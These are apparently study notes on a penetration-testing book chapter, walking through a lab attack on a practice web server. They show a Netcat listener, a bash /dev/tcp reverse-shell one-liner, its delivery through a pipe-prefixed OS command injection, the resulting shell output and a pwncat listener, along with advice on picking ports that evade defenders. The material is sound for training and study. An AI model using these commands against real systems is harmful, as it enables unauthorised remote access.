# Executing a Connection
**Chapter** 7 &emsp;|&emsp; **Page** 146

Example scenario of establishing a reverse shell connection between a Kali attacker machine and a target machine (e.g., web application server on port 172.16.10.12).


## Setting Up a Netcat Listener
Use Netcat to create a shell listener on the Kali attacker machine.<br>
Execute the following command in a fresh terminal window:
```
nc -l -p 1337 -vv
```

- The -l [listen] option instructs Netcat to listen for incoming connections.
- The -p [port] option specifies the port number to listen on.
- The -v [verbose] option provides more detailed output, which can be very useful for monitoring and debugging (using more than one -v flag increases the verbosity).

> #### **NOTE**
> In real-world scenarios, you want to be more discreet. Choose a port that will blend in with the environment.
> Outbound connections on port 1337 may raise suspicion and trigger alerts.
> However, common ports such as 80 or 443 which are often used by HTTP, might be overlooked by blue team analysts.


## Crafting a Payload
Next, craft an interactive reverse shell payload with a single line of bash.<br>
This line of code will be submitted as user input to the target application in the following step.
```
bash -c 'bash -i >& /dev/tcp/172.16.10.1/1337 0>&1'
```

- The `-i` [interactive] option makes the shell interactive, able to receive input and produce output.
- The `/dev/tcp` path is a special *pseudo-device* file in Linux that provides access to TCP sockets.
	- Similarly, the `/dev/udp` file exists for UDP.
- Appended to the filepath is the attacking machine's IP address and port, for which a listener shell is waiting for incoming connections.
	- Example: `/dev/tcp/172.16.10.1/1337`.
- The `>&` syntax combines the standard output (stdout) and stabdard error (stderr) streams into a single stream.
	- By combining streams, we ensure both regular command output and error messages generated by the reverse shell get redirected to the listener.
- The `-c` [command\_string, str] reads and execute commands from the first non-option arg, *command\_string* or *str*.
	- Notice after the `-c` option, the entire payload is wrapped in single quotes, allowing to explicitly invoke a new bash shell instance.
	- This also ensures the subsequent command is executed using bash, regardless of the default shell on the target system.
	- If needed, you can even specify the bash shell's full executable path (using */bin/bash -c*) to further ensure the payload executes correctly.


## Delivering and Initializing the Payload
To deliver the single-line reverse shell payload, exploit the OS command injection vulnerability that was previously identified in the web application server (172.16.10.12).
If you remember, the vulnerability was identified to be a HTML input field that could be exploited by prepending a payload with the pipe (|) metacharacter.<br>
For example, we would deliver our single-line reverse shell payload by submitting the following in the input field:
```
|bash -c 'bash -i >& /dev/tcp/172.16.10.1/1337 0>&1'
```


## Executing Commands
After exploiting the OS command injection payload by submitting the payload in the Input field of the vulnerable webpage,<br>
you should see the following in the terminal window where the Netcat listener is running: 
```
--snip--
listening on [any] 1337 ...
172.16.10.12: inverse host lookup failed: Unknown host
connect to [172.16.10.1] from (UNKNOWN) [172.16.10.12] 40318
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@p-web-02:/var/www/html$ 
--snip--
```

You now have a reverse shell running. Test it out by running commands. Example:
```
www-data@p-web-02:/var/www/html$ uname -a
uname -a
Linux p-web-02.acme-infinity-servers.com 6.18.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.18.12-1kali1 (2026-02-25) x86_64 GNU/Linux
www-data@p-web-02:/var/www/html$ 
```


## Listening with Pwncat
Pwncat is another great alternative utility for capturing and interacting with reverse shells.<br>
Try creating a reverse shell listener and test the variety of Pwncat's built-in modules.

> ### *NOTE*
> The book uses *pwncat-cs*, which is a community managed version of pwncat with additional features.
> However, it does not appear to work or be maintained anymore.
> The alternative is to use base *pwncat* or install a community managed fork of pwncat-cs, called [*pwncat-vl*](https://github.com/Chocapikk/pwncat-vl).
> Pwncat-vl can be installed with the following command:
> `pipx install git+https://github.com/Chocapikk/pwncat-vl`


###### Start a pwncat reverse shell listener
```
pwncat -l 1337

bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@p-web-02:/var/www/html$
```

